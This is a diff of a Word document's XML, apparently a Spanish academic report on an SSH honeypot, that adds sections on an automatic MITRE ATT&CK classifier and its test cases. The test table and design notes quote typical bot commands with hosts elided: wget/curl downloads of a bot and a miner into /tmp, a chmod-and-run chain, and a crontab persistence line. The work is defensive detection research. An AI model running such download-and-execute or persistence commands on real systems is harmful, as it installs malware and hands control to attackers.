+        <w:t xml:space="preserve">Una versión anterior de esta tabla, elaborada a mano a partir de la literatura, incluía dos asignaciones que se corrigieron al construir el clasificador. Los intentos de autenticación se habían situado en la táctica Initial Access, cuando la fuerza bruta (T1110) pertenece a Credential Access; y las propias sesiones SSH se habían clasificado como movimiento lateral (T1021.004), cuando el honeypot es el punto de entrada del atacante y no una máquina desde la que se desplace hacia otras. Asimismo, el acceso con las credenciales de root se reasignó de Default Accounts (T1078.001) a Local Accounts (T1078.003).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">La tabla con los datos reales (sesiones, IPs y ejemplos de cada técnica) la genera el analizador al procesar los logs de la captura, y se incorporará al informe de inteligencia junto con las recomendaciones defensivas asociadas a cada técnica.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18302,6 +19517,74 @@
           </w:p>
         </w:tc>
       </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1350"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">mapear (mitre_mapping.py)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">login.failed / success, command.input</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Técnicas MITRE ATT&amp;CK con evidencias</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
     </w:tbl>
     <w:p>
       <w:pPr>
@@ -18338,6 +19621,196 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">La función analyze_command_urls se añadió tras las pruebas con Cowrie real. Cowrie solo registra un evento de descarga cuando el fichero se descarga con éxito, pero en la práctica muchos servidores de malware de las botnets ya han sido retirados cuando el bot ejecuta el comando wget o curl. Esas URLs siguen siendo indicadores de compromiso (IOC) útiles para el informe de inteligencia, así que la función las extrae directamente del texto de los comandos mediante una expresión regular.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Clasificación Automática en MITRE ATT&amp;CK</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">La clasificación de la actividad observada se ha automatizado en un módulo independiente, mitre_mapping.py, que el analizador utiliza en cada ejecución. Hacerlo a mano sobre miles de eventos sería lento y propenso a errores; automatizarlo permite además repetir el análisis cada vez que se descargan logs nuevos durante el periodo de captura.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El módulo define un catálogo de reglas (Tabla 2), cada una formada por el identificador de la técnica, su nombre oficial, la táctica a la que pertenece, una expresión regular que reconoce los indicadores en el texto del comando y una recomendación defensiva, con la referencia a la mitigación de ATT&amp;CK (M1022, M1027, M1029...) cuando el marco la define. Las decisiones de diseño más relevantes son:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:left="720" w:hanging="357"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Un comando puede corresponder a varias técnicas. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Los bots suelen encadenar órdenes en una sola línea (cd /tmp; wget ...; chmod +x ...; ./bot). Cada regla se evalúa por separado sobre el comando completo, de modo que esa línea suma a la vez a T1105, T1222.002 y T1059.004.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:left="720" w:hanging="357"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">La autenticación se clasifica por tipo de evento, no por texto. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Los eventos cowrie.login.failed se asignan a T1110.001 (fuerza bruta) y los cowrie.login.success a T1078.003 (uso de cuentas válidas), con la credencial empleada como evidencia.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:left="720" w:hanging="357"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Se cuentan sesiones e IPs, no solo eventos. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Un mismo bot puede repetir un comando muchas veces en una sesión. El número de sesiones distintas y de IPs distintas que usan cada técnica refleja mejor su prevalencia real entre los atacantes.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:left="720" w:hanging="357"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Lo que no se clasifica se muestra. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Los comandos que no encajan en ninguna regla aparecen en una sección propia del informe para su revisión manual. Así, una técnica que el catálogo no contemple no se pierde en silencio, y la revisión permite ampliar las reglas.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El resultado se entrega en tres formatos: una sección del informe de texto agrupada por tácticas en el orden de la matriz de ATT&amp;CK, una gráfica de sesiones por técnica y un fichero CSV (mitre_mapping.csv) con táctica, identificador, nombre, sesiones, eventos, IPs, ejemplo y recomendación, que se abre directamente en una hoja de cálculo y sirve de base para las tablas del informe de inteligencia.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -20356,6 +21829,657 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:t xml:space="preserve">Prueba del Clasificador MITRE ATT&amp;CK</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El clasificador se prueba con un conjunto de 33 casos recogido en el fichero test_mitre_mapping.py, que puede ejecutarse de nuevo cada vez que se modifiquen las reglas. Los casos incluyen los comandos típicos de los bots y, sobre todo, posibles falsos positivos: las expresiones regulares cortas son propensas a encontrar coincidencias donde no las hay.</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:type="pct" w:w="5000"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:color="auto" w:sz="4"/>
+          <w:left w:val="single" w:color="auto" w:sz="4"/>
+          <w:bottom w:val="single" w:color="auto" w:sz="4"/>
+          <w:right w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
+        </w:tblBorders>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="3016"/>
+        <w:gridCol w:w="2937"/>
+        <w:gridCol w:w="1985"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:tblHeader/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Comando</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1850"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Riesgo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1250"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Técnicas obtenidas</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">wget http://.../bot.x86 -O /tmp/bot</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Que la «w» se confunda con el comando w (T1033)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1250"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Solo T1105</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">pidof sshd</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Que contenga «id» y cuente como T1033</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1250"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Solo T1057</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">crontab -l</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Que listar tareas cuente como persistencia</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1250"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Ninguna propia</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">(crontab -l; echo '...') | crontab -</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Que no se detecte la instalación de la tarea</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1250"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1053.003</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">curl http://.../miner.sh -o /tmp/miner.sh</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Que solo se detecte la descarga</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1250"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1105 y T1496.001</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">echo hidden / cat /tmp/window.txt</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Coincidencias parciales («id», «w»)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1250"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Ninguna</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:before="60" w:line="360"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tabla 9. Casos de prueba del clasificador con riesgo de error.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
